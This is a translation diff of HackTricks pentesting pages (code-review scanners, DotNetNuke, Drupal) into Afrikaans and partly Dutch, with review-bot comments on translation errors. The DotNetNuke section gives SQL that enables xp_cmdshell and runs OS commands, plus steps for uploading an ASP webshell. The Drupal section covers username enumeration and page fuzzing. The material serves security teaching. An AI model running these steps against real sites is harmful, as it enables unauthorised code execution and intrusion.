[**Snyk**](https://snyk.io/product/snyk-code/) -There is an **installable free version**. - -#### Quick Start +Daar is 'n **installeerbare gratis weergawe**. 
+#### Vinnige Begin ```bash # Install sudo npm install -g snyk @@ -251,35 +248,31 @@ snyk container test [image] # Test for IaC vulns snyk iac test ``` - -You can also use the [**snyk VSCode Extension**](https://marketplace.visualstudio.com/items?itemName=snyk-security.snyk-vulnerability-scanner) to get findings inside VSCode. +Jy kan ook die [**snyk VSCode-uitbreiding**](https://marketplace.visualstudio.com/items?itemName=snyk-security.snyk-vulnerability-scanner) gebruik om bevindings binne VSCode te kry. ### [Insider](https://github.com/insidersec/insider) -It's **Open Source**, but looks **unmaintained**. +Dit is **Open Source**, maar lyk **ongeonderhou**. -#### Supported Languages +#### Ondersteunde Tale -Java (Maven and Android), Kotlin (Android), Swift (iOS), .NET Full Framework, C#, and Javascript (Node.js). - -#### Quick Start +Java (Maven en Android), Kotlin (Android), Swift (iOS), .NET Full Framework, C#, en Javascript (Node.js). +#### Vinnige Begin ```bash # Check the correct release for your environment $ wget https://github.com/insidersec/insider/releases/download/2.1.0/insider_2.1.0_linux_x86_64.tar.gz -$ tar -xf insider_2.1.0_linux_x86_64.tar.gz +$ tar -xf insider_2.1.0_linux_x86_64.tar.gz $ chmod +x insider $ ./insider --tech javascript --target ``` - ### [**DeepSource**](https://deepsource.com/pricing) -Free for **public repos**. +Gratis vir **openbare repos**. ## NodeJS * **`yarn`** - ```bash # Install brew install yarn @@ -288,9 +281,7 @@ cd /path/to/repo yarn audit npm audit ``` - * **`pnpm`** - ```bash # Install npm install -g pnpm 
@@ -298,18 +289,14 @@ npm install -g pnpm cd /path/to/repo pnpm audit ``` - -* [**nodejsscan**](https://github.com/ajinabraham/nodejsscan)**:** Static security code scanner (SAST) for Node.js applications powered by [libsast](https://github.com/ajinabraham/libsast) and [semgrep](https://github.com/returntocorp/semgrep). - +* [**nodejsscan**](https://github.com/ajinabraham/nodejsscan)**:** Statische sekuriteitskode-skander (SAST) vir Node.js-toepassings aangedryf deur [libsast](https://github.com/ajinabraham/libsast) en [semgrep](https://github.com/returntocorp/semgrep). ```bash # Install & run docker run -it -p 9090:9090 opensecurity/nodejsscan:latest # Got to localhost:9090 # Upload a zip file with the code ``` - -* [**RetireJS**](https://github.com/RetireJS/retire.js)**:** The goal of Retire.js is to help you detect the use of JS-library versions with known vulnerabilities. - +* [**RetireJS**](https://github.com/RetireJS/retire.js)**:** Die doel van Retire.js is om jou te help om die gebruik van JS-biblioteek weergawes met bekende kwesbaarhede op te spoor. ```bash # Install npm install -g retire 
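Review bot: hunk @@ -211,26 +209,25 @@ rewrites the loop body but keeps a pre-existing bug on it: `--output="${OUTPUT_DIR_PATH}/$db).sarif"` has a stray `)` in the file name, so the file actually written is `<db>).sarif`, while the next line appends `${OUTPUT_DIR_PATH}/$db.sarif` to `FINAL_MSG`, so the path printed at the end never exists. Since the lines are being rewritten anyway, drop the `)` and restore the indentation of the `for` body instead of flattening it to column 0.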
@@ -317,15 +304,13 @@ npm install -g retire cd /path/to/repo retire --colors ``` - ## Electron -* [**electronegativity**](https://github.com/doyensec/electronegativity)**:** It's a tool to identify misconfigurations and security anti-patterns in Electron-based applications. +* [**electronegativity**](https://github.com/doyensec/electronegativity)**:** Dit is 'n instrument om verkeerde konfigurasies en sekuriteitsantipatrone in Electron-gebaseerde toepassings te identifiseer. ## Python -* [**Bandit**](https://github.com/PyCQA/bandit)**:** Bandit is a tool designed to find common security issues in Python code. To do this Bandit processes each file, builds an AST from it, and runs appropriate plugins against the AST nodes. Once Bandit has finished scanning all the files it generates a report. - +* [**Bandit**](https://github.com/PyCQA/bandit)**:** Bandit is 'n instrument wat ontwerp is om algemene sekuriteitsprobleme in Python-kode te vind. Om dit te doen, verwerk Bandit elke lêer, bou 'n AST daaruit en voer toepaslike invoegtoepassings teen die AST-knoppies uit. Nadat Bandit klaar is met die skandering van al die lêers, genereer dit 'n verslag. ```bash # Install pip3 install bandit 
@@ -333,20 +318,16 @@ pip3 install bandit # Run bandit -r ``` - -* [**safety**](https://github.com/pyupio/safety): Safety checks Python dependencies for known security vulnerabilities and suggests the proper remediations for vulnerabilities detected. Safety can be run on developer machines, in CI/CD pipelines and on production systems. - +* [**veiligheid**](https://github.com/pyupio/safety): Safety kontroleer Python afhanklikhede vir bekende sekuriteitskwesbaarhede en stel die regte herstelmaatreëls voor vir opgespoorde kwesbaarhede. Safety kan op ontwikkelaarsmasjiene, in CI/CD-pyplyne en op produksiestelsels uitgevoer word. ```bash # Install pip install safety # Run safety check ``` - -* [~~**Pyt**~~](https://github.com/python-security/pyt): Unmaintained. +* [~~**Pyt**~~](https://github.com/python-security/pyt): Ononderhoud. ## .NET - ```bash # dnSpy https://github.com/0xd4d/dnSpy 
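Review bot: in hunk @@ -333,20 +318,16 @@ the link text for the safety tool becomes `[**veiligheid**](https://github.com/pyupio/safety)`; `safety` is a package and command name (`pip install safety`, `safety check` two lines below), so it must stay untranslated. Also, "Unmaintained" is rendered as `Ononderhoud` here but as `ongeonderhou` in the Insider hunk (@@ -251); use one spelling for both.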
@@ -354,9 +335,20 @@ https://github.com/0xd4d/dnSpy # .NET compilation C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe test.cs ``` - ## RUST +RUST is 'n veilige, betroubare en hoë prestasie programmeertaal wat geskik is vir die ontwikkeling van betroubare en effektiewe sagteware. Dit is ontwerp om geheueveiligheid, geloopstydprestasie en geloopstydveiligheid te verseker. RUST maak gebruik van 'n streng statiese tipe-sisteem en 'n eienaar-gebaseerde geheuebestuurmodel om geheuelekke en data-rasse te voorkom. + +RUST bied 'n aantal kenmerke wat dit 'n gewilde keuse maak vir die ontwikkeling van veilige sagteware. Dit sluit in: + +- **Nul-koste abstraksies**: RUST maak dit moontlik om hoëvlak abstraksies te gebruik sonder om enige merkbare impak op die uitvoeringstyd te hê nie. +- **Geheueveiligheid**: RUST se streng statiese tipe-sisteem en eienaar-gebaseerde geheuebestuurmodel help om geheuelekke en data-rasse te voorkom. +- **Thread-veiligheid**: RUST maak dit maklik om veilige, geloopstydveilige veelvoudige drade te skryf sonder om handmatige sinkronisasie te gebruik. +- **Concurrency**: RUST bied 'n stelsel vir veilige en effektiewe gelyktydige programmering. +- **Betroubaarheid**: RUST se statiese tipe-sisteem en streng kompilering help om foute vroeg in die ontwikkelingsproses op te spoor en te voorkom. +- **Prestasie**: RUST is ontwerp om hoë prestasie te lewer sonder om in te boet aan veiligheid of abstraksievlak. + +RUST het 'n aktiewe gemeenskap en 'n ryk ekosisteem van biblioteke en gereedskap wat die ontwikkeling van sagteware vergemaklik. Dit word algemeen gebruik vir die ontwikkeling van stelselsagteware, netwerkprotokolle, bedryfstelsels en ander kritieke toepassings. ```bash # Install cargo install cargo-audit 
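Review bot: hunk @@ -354,9 +335,20 @@ adds ten lines of new prose under `## RUST` (a general description of the language plus a bullet list of features such as `Nul-koste abstraksies`, `Geheueveiligheid`, `Thread-veiligheid`) that have no counterpart in the removed English lines. A translation PR should not introduce content the source page does not have; drop the added paragraphs so the section is again the heading followed directly by the `cargo install cargo-audit` block.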
@@ -367,9 +359,21 @@ cargo audit #Update the Advisory Database cargo audit fetch ``` - ## Java +Java is 'n populaire programmeertaal wat gebruik word vir die ontwikkeling van verskeie toepassings, insluitend webtoepassings. Dit is 'n objekgeoriënteerde taal wat platformonafhanklik is, wat beteken dat dit op verskillende bedryfstelsels kan hardloop sonder om die kode te verander. Dit maak gebruik van 'n virtuele masjien (VM) om die kode uit te voer. + +### Java-kodehersieningsgereedskap + +Hier is 'n paar gereedskap wat gebruik kan word vir die hersiening van Java-kode: + +- **Checkstyle**: 'n gereedskap wat gebruik word om die kode te hersien en te verseker dat dit voldoen aan 'n spesifieke kodekonvensie. +- **FindBugs**: 'n statiese analisewerktuig wat gebruik word om potensiële programmeerfoute in Java-kode te identifiseer. +- **PMD**: 'n gereedskap wat gebruik word om kode te analiseer en potensiële probleme en swak praktyke te identifiseer. +- **SonarQube**: 'n platform wat gebruik word vir die kontinue hersiening van kode, met 'n fokus op die identifisering van kwessies en die bevordering van kodekwaliteit. +- **SpotBugs**: 'n opvolger van FindBugs wat gebruik word om potensiële programmeerfoute in Java-kode te identifiseer. + +Dit is slegs 'n paar voorbeelde van gereedskap wat beskikbaar is vir die hersiening van Java-kode. Dit is belangrik om die regte gereedskap te kies wat aan jou spesifieke behoeftes voldoen. ```bash # JD-Gui https://github.com/java-decompiler/jd-gui 
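Review bot: hunk @@ -367,9 +359,21 @@ has the same problem under `## Java`: the paragraph describing Java and the new `### Java-kodehersieningsgereedskap` subsection listing Checkstyle, FindBugs, PMD, SonarQube and SpotBugs translate nothing that was removed, and they introduce a heading the English page does not have. Remove them and keep only the heading before the `# JD-Gui` block.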
@@ -380,28 +384,25 @@ mkdir META-INF echo "Main-Class: test" > META-INF/MANIFEST.MF jar cmvf META-INF/MANIFEST.MF test.jar test.class ``` - -| Task | Command | +| Taak | Opdrag | | --------------- | --------------------------------------------------------- | -| Execute Jar | java -jar \[jar] | -| Unzip Jar | unzip -d \[output directory] \[jar] | -| Create Jar | jar -cmf META-INF/MANIFEST.MF \[output jar] \* | -| Base64 SHA256 | sha256sum \[file] \| cut -d' ' -f1 \| xxd -r -p \| base64 | -| Remove Signing | rm META-INF/_.SF META-INF/_.RSA META-INF/\*.DSA | -| Delete from Jar | zip -d \[jar] \[file to remove] | -| Decompile class | procyon -o . \[path to class] | -| Decompile Jar | procyon -jar \[jar] -o \[output directory] | -| Compile class | javac \[path to .java file] | - -## Go +| Voer Jar uit | java -jar \[jar] | +| Ontplooi Jar | unzip -d \[uitvoer gids] \[jar] | +| Skep Jar | jar -cmf META-INF/MANIFEST.MF \[uitvoer jar] \* | +| Base64 SHA256 | sha256sum \[lêer] \| cut -d' ' -f1 \| xxd -r -p \| base64 | +| Verwyder Ondertekening | rm META-INF/_.SF META-INF/_.RSA META-INF/\*.DSA | +| Verwyder uit Jar | zip -d \[jar] \[lêer om te verwyder] | +| Ontsleutel klas | procyon -o . \[pad na klas] | +| Ontsleutel Jar | procyon -jar \[jar] -o \[uitvoer gids] | +| Kompileer klas | javac \[pad na .java lêer] | +## Gaan ```bash https://github.com/securego/gosec ``` - ## PHP -[Psalm](https://phpmagazine.net/2018/12/find-errors-in-your-php-applications-with-psalm.html) and [PHPStan](https://phpmagazine.net/2020/09/phpstan-pro-edition-launched.html). +[Psalm](https://phpmagazine.net/2018/12/find-errors-in-your-php-applications-with-psalm.html) en [PHPStan](https://phpmagazine.net/2020/09/phpstan-pro-edition-launched.html). ### Wordpress Plugins 
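Review bot: hunk @@ -380,28 +384,25 @@ renames the `## Go` heading to `## Gaan`, turning the language name into the Afrikaans verb; the heading above `https://github.com/securego/gosec` must stay `Go`. In the table, `Ontsleutel klas` / `Ontsleutel Jar` render "Decompile" as "decrypt", which is a different operation (use `Dekompileer`), and `Ontplooi Jar` reads as "deploy Jar" rather than "unzip".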
@@ -413,16 +414,16 @@ https://github.com/securego/gosec ## JavaScript -### Discovery +### Ontdekking 1. Burp: - * Spider and discover content - * Sitemap > filter - * Sitemap > right-click domain > Engagement tools > Find scripts +* Spider en ontdek inhoud +* Sitemap > filter +* Sitemap > klik met rechtermuisknop op domein > Engagement tools > Vind scripts 2. [WaybackURLs](https://github.com/tomnomnom/waybackurls): - * `waybackurls |grep -i "\.js" |sort -u` +* `waybackurls |grep -i "\.js" |sort -u` -### Static Analysis +### Statische Analyse #### Unminimize/Beautify/Prettify 
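Review bot: hunk @@ -413,16 +414,16 @@ flattens the nested list: the sub-items under `1. Burp:` and `2. [WaybackURLs]` lose their indentation (`   * Spider and discover content` becomes `* Spider en ontdek inhoud`), so they no longer render as children of the numbered steps. The hunk is also written in Dutch rather than Afrikaans (`klik met rechtermuisknop op domein`, `Statische Analyse`), which does not match the rest of the PR.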
@@ -431,27 +432,27 @@ https://github.com/securego/gosec #### Deobfuscate/Unpack -**Note**: It may not be possible to fully deobfuscate. +**Opmerking**: Dit is mogelijk niet volledig deobfuscateerbaar. -1. Find and use .map files: - * If the .map files are exposed, they can be used to easily deobfuscate. - * Commonly, foo.js.map maps to foo.js. Manually look for them. - * Use [JS Miner](https://github.com/PortSwigger/js-miner) to look for them. - * Ensure active scan is conducted. - * Read '[Tips/Notes](https://github.com/minamo7sen/burp-JS-Miner/wiki#tips--notes)' - * If found, use [Maximize](https://www.npmjs.com/package/maximize) to deobfuscate. -2. Without .map files, try JSnice: - * References: http://jsnice.org/ & https://www.npmjs.com/package/jsnice - * Tips: - * If using jsnice.org, click on the options button next to the "Nicify JavaScript" button, and de-select "Infer types" to reduce cluttering the code with comments. - * Ensure you do not leave any empty lines before the script, as it may affect the deobfuscation process and give inaccurate results. -3. Use console.log(); - * Find the return value at the end and change it to `console.log();` so the deobfuscated js is printed instead of being executing. - * Then, paste the modified (and still obfuscated) js into https://jsconsole.com/ to see the deobfuscated js logged to the console. - * Finally, paste the deobfuscated output into https://prettier.io/playground/ to beautify it for analysis. - * **Note**: If you are still seeing packed (but different) js, it may be recursively packed. Repeat the process. +1. Vind en gebruik .map-bestanden: +* Als de .map-bestanden blootgesteld zijn, kunnen ze gemakkelijk worden gebruikt om te deobfuscate. +* Vaak wordt foo.js.map gemapt naar foo.js. Zoek er handmatig naar. +* Gebruik [JS Miner](https://github.com/PortSwigger/js-miner) om ernaar te zoeken. +* Zorg ervoor dat er een actieve scan wordt uitgevoerd. 
+* Lees '[Tips/Notes](https://github.com/minamo7sen/burp-JS-Miner/wiki#tips--notes)' +* Als ze gevonden zijn, gebruik [Maximize](https://www.npmjs.com/package/maximize) om te deobfuscate. +2. Zonder .map-bestanden, probeer JSnice: +* Referenties: http://jsnice.org/ & https://www.npmjs.com/package/jsnice +* Tips: +* Als je jsnice.org gebruikt, klik dan op de optieknop naast de "Nicify JavaScript" knop en deselecteer "Infer types" om de code niet te overladen met opmerkingen. +* Zorg ervoor dat je geen lege regels achterlaat voor het script, omdat dit het deobfuscation proces kan beïnvloeden en onnauwkeurige resultaten kan geven. +3. Gebruik console.log(); +* Vind de retourwaarde aan het einde en verander deze in `console.log();` zodat de deobfuscated js wordt afgedrukt in plaats van uitgevoerd. +* Plak vervolgens de aangepaste (en nog steeds geobfusceerde) js in https://jsconsole.com/ om de deobfuscated js in de console te zien. +* Plak tenslotte de deobfuscated output in https://prettier.io/playground/ om het te verfraaien voor analyse. +* **Opmerking**: Als je nog steeds verpakte (maar verschillende) js ziet, kan het recursief verpakt zijn. Herhaal het proces. -References +Referenties * https://www.youtube.com/watch?v=\_v8r\_t4v6hQ * https://blog.nvisium.com/angular-for-pentesters-part-1 @@ -461,7 +462,7 @@ Tools * https://portswigger.net/burp/documentation/desktop/tools/dom-invader -#### Less Used References +#### Minder Gebruikte Referenties * https://cyberchef.org/ * https://olajs.com/javascript-prettifier @@ -470,14 +471,14 @@ Tools
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Andere manieren om HackTricks te ondersteunen: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* Als je je **bedrijf geadverteerd wilt zien in HackTricks** of **HackTricks in PDF wilt downloaden**, bekijk dan de [**ABONNEMENTSPLANNEN**](https://github.com/sponsors/carlospolop)! +* Koop de [**officiële PEASS & HackTricks merchandise**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), onze collectie exclusieve [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Doe mee aan de** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of de [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel je hacktrucs door PR's in te dienen bij de** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
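Review bot: the hunks from @@ -431,27 +432,27 @@ to the end of the file (@@ -461 and @@ -470) are Dutch, not Afrikaans (`mogelijk`, `.map-bestanden`, `Zorg ervoor dat`, `Als je je bedrijf geadverteerd wilt zien`, `Doe mee aan de`), so the JavaScript deobfuscation steps and the support footer read in a different language from the rest of this page and from the footers of the other files in this patch (`Sluit aan by die ... Discord-groep`). Redo these in Afrikaans, and restore the indentation of the nested bullets under steps 1 to 3, which this hunk flattens in the same way as the Discovery list.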
diff --git a/network-services-pentesting/pentesting-web/dotnetnuke-dnn.md b/network-services-pentesting/pentesting-web/dotnetnuke-dnn.md index 69dba8605..58d560617 100644 --- a/network-services-pentesting/pentesting-web/dotnetnuke-dnn.md +++ b/network-services-pentesting/pentesting-web/dotnetnuke-dnn.md @@ -2,63 +2,59 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks-repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud-repo](https://github.com/carlospolop/hacktricks-cloud)**.
## DotNetNuke (DNN) -If you enter as **administrator** in DNN it's easy to obtain RCE. +As jy as **administrateur** in DNN intree, is dit maklik om RCE te verkry. ## RCE ### Via SQL -A SQL console is accessible under the **`Settings`** page where you can enable **`xp_cmdshell`** and **run operating system commands**. - -Use these lines to enable **`xp_cmdshell`**: +'n SQL-konsole is toeganklik onder die **`Settings`**-bladsy waar jy **`xp_cmdshell`** kan aktiveer en **bedryfstelselopdragte kan uitvoer**. +Gebruik hierdie lyne om **`xp_cmdshell`** te aktiveer: ```sql EXEC sp_configure 'show advanced options', '1' RECONFIGURE -EXEC sp_configure 'xp_cmdshell', '1' +EXEC sp_configure 'xp_cmdshell', '1' RECONFIGURE ``` +En druk **"Voer Skrip"** om daardie sQL sinne uit te voer. -And press **"Run Script"** to run that sQL sentences. - -Then, use something like the following to run OS commands: - +Gebruik dan iets soos die volgende om OS-opdragte uit te voer: ```sql xp_cmdshell 'whoami' ``` +### Via ASP-webshell -### Via ASP webshell +In `Instellings -> Sekuriteit -> Meer -> Meer Sekuriteitsinstellings` kan jy **nuwe toegelate uitbreidings** byvoeg onder `Toelaatbare Lêeruitbreidings`, en dan die `Stoor`-knoppie klik. -In `Settings -> Security -> More -> More Security Settings` you can **add new allowed extensions** under `Allowable File Extensions`, and then clicking the `Save` button. +Voeg **`asp`** of **`aspx`** by en laai dan 'n **asp-webshell** op met die naam `shell.asp` byvoorbeeld in **`/admin/lêerbestuur`**. -Add **`asp`** or **`aspx`** and then in **`/admin/file-management`** upload an **asp webshell** called `shell.asp` for example. +Toegang tot **`/Portals/0/shell.asp`** om toegang tot jou webshell te verkry. -Then access to **`/Portals/0/shell.asp`** to access your webshell. +### Bevoorregte Eskalasie -### Privilege Escalation - -You can **escalate privileges** using the **Potatoes** or **PrintSpoofer** for example. 
+Jy kan **bevoorregte eskalasie** doen deur die gebruik van **Potatoes** of **PrintSpoofer** byvoorbeeld.
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy vir 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of HackTricks aflaai in PDF-formaat**? Kyk na die [**SUBSKRIPSIEPLANNE**](https://github.com/sponsors/carlospolop)! 
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
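Review bot: in hunk @@ -2,63 +2,59 @@ the upload path `/admin/file-management` is translated to **`/admin/lêerbestuur`**; it is a URL the reader has to request, so it must stay exactly as in the source. The same applies to the DNN admin UI strings: `Settings -> Security -> More -> More Security Settings`, `Allowable File Extensions`, `Save` and the `Run Script` button become `Instellings -> Sekuriteit -> Meer -> Meer Sekuriteitsinstellings`, `Toelaatbare Lêeruitbreidings`, `Stoor` and `Voer Skrip`, which a reader will not find in the product's menus; keep them in English inside the backticks, as the hunk already does for `Settings` in the SQL paragraph. Minor: `sQL sinne` carries over the source's `sQL` typo; write `SQL`.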
diff --git a/network-services-pentesting/pentesting-web/drupal.md b/network-services-pentesting/pentesting-web/drupal.md index 9e5bf1f00..a7a361c4b 100644 --- a/network-services-pentesting/pentesting-web/drupal.md +++ b/network-services-pentesting/pentesting-web/drupal.md @@ -2,87 +2,80 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-## Discovery - -* Check **meta** +## Ontdekking +* Kontroleer **meta** ```bash curl https://www.drupal.org/ | grep 'content="Drupal' ``` - -* **Node**: Drupal **indexes its content using nodes**. A node can **hold anything** such as a blog post, poll, article, etc. The page URIs are usually of the form `/node/`. - +* **Node**: Drupal **indekseer sy inhoud met behulp van nodes**. 'n Node kan **enige iets bevat**, soos 'n blogpos, opiniepeiling, artikel, ens. Die bladsy-URI's is gewoonlik in die vorm `/node/`. ```bash curl drupal-site.com/node/1 ``` +## Opname -## Enumeration +Drupal ondersteun standaard **drie tipes gebruikers**: -Drupal supports **three types of users** by default: +1. **`Administrateur`**: Hierdie gebruiker het volledige beheer oor die Drupal-webwerf. +2. **`Geverifieerde Gebruiker`**: Hierdie gebruikers kan op die webwerf inlog en operasies uitvoer soos die byvoeg en wysig van artikels gebaseer op hul toestemmings. +3. **`Anoniem`**: Alle webwerfbesoekers word as anoniem aangedui. Standaard word hierdie gebruikers slegs toegelaat om plasings te lees. -1. **`Administrator`**: This user has complete control over the Drupal website. -2. **`Authenticated User`**: These users can log in to the website and perform operations such as adding and editing articles based on their permissions. -3. **`Anonymous`**: All website visitors are designated as anonymous. By default, these users are only allowed to read posts. - -### Version - -* Check `/CHANGELOG.txt` +### Weergawe +* Kontroleer `/CHANGELOG.txt` ```bash curl -s http://drupal-site.local/CHANGELOG.txt | grep -m2 "" Drupal 7.57, 2018-02-21 ``` - {% hint style="info" %} -Newer installs of Drupal by default block access to the `CHANGELOG.txt` and `README.txt` files. +Nuwer installasies van Drupal blokkeer standaard toegang tot die `CHANGELOG.txt` en `README.txt` lêers. 
{% endhint %} -### Username enumeration +### Gebruikersnaam opsomming -#### Register +#### Registreer -In _/user/register_ just try to create a username and if the name is already taken it will be notified: +In _/user/register_ probeer net om 'n gebruikersnaam te skep en as die naam reeds geneem is, sal dit aangedui word: ![](<../../.gitbook/assets/image (254).png>) -#### Request new password +#### Versoek nuwe wagwoord -If you request a new password for an existing username: +As jy 'n nuwe wagwoord versoek vir 'n bestaande gebruikersnaam: ![](<../../.gitbook/assets/image (255).png>) -If you request a new password for a non-existent username: +As jy 'n nuwe wagwoord versoek vir 'n nie-bestaande gebruikersnaam: ![](<../../.gitbook/assets/image (256).png>) -### Get number of users +### Kry aantal gebruikers -Accessing _/user/\_ you can see the number of existing users, in this case is 2 as _/users/3_ returns a not found error: +Deur toegang te verkry tot _/user/\_ kan jy die aantal bestaande gebruikers sien, in hierdie geval is dit 2 aangesien _/users/3_ 'n nie gevind fout teruggee: ![](<../../.gitbook/assets/image (257).png>) ![](<../../.gitbook/assets/image (227) (1) (1).png>) -### Hidden pages +### Versteekte bladsye -**Fuzz `/node/$` where `$` is a number** (from 1 to 500 for example).\ -You could find **hidden pages** (test, dev) which are not referenced by the search engines. - -#### Installed modules info +**Fuzz `/node/$` waar `$` 'n nommer is** (van 1 tot 500 byvoorbeeld).\ +Jy kan **versteekte bladsye** (toets, ontwikkeling) vind wat nie deur soekmasjiene verwys word nie. +#### Geïnstalleerde module-inligting ```bash #From https://twitter.com/intigriti/status/1439192489093644292/photo/1 #Get info on installed modules 
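Review bot: hunk @@ -2,87 +2,80 @@ removes the blank lines between headings, list items and the fenced blocks that follow them (`## Ontdekking` is now immediately followed by `* Kontroleer **meta**`, and each `* ...` item is glued to its bash code fence). That is whitespace churn unrelated to the translation, and some Markdown renderers treat a fence glued to a list item differently from one separated by a blank line; keep the original spacing. The role names in the numbered list (`Administrateur`, `Geverifieerde Gebruiker`, `Anoniem`) are Drupal's own role labels inside backticks and are better left as `Administrator`, `Authenticated User`, `Anonymous`.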
